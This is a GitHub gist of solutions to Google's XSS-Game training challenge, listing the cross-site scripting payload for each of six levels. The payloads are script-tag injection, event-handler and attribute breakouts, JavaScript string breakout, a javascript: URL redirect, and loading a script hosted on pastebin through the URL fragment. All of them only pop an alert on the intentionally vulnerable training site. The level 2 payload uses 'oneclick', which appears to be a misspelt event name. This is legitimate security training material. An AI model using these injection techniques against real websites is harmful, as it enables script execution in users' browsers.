Last active
December 8, 2018 11:48
-
-
Save Aseyed/154d2274f7fba823f93857938dd4adc7 to your computer and use it in GitHub Desktop.
Google XSS-Game
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################## | |
| Level 1: Hello, world of XSS | |
| https://xss-game.appspot.com/level1/frame | |
| query=<script>alert(123)</script> | |
| ############################################################################## | |
| Level 2: Persistence is key | |
| https://xss-game.appspot.com/level2/frame | |
| post-content=<img src='foobar' oneclick='alert(123)'> | |
| ############################################################################## | |
| Level 3: That sinking feeling... | |
| https://xss-game.appspot.com/level3/frame#1 | |
| URL=https://xss-game.appspot.com/level3/frame#3' onerror='alert(123)'> | |
| ############################################################################## | |
| Level 4: Context matters | |
| look at startTimer functuin in source code | |
| https://xss-game.appspot.com/level4/frame | |
| timer=');alert('xss | |
| ############################################################################## | |
| Level 5: Breaking protocol | |
| https://xss-game.appspot.com/level5/frame | |
| URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(123) | |
| ############################################################################## | |
| Level 6: Follow the X | |
| https://xss-game.appspot.com/level6/frame#/static/gadget.js | |
| put your code (alert(123)) in this site `pastebin.com` and put the url after # | |
| ############################################################################## |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment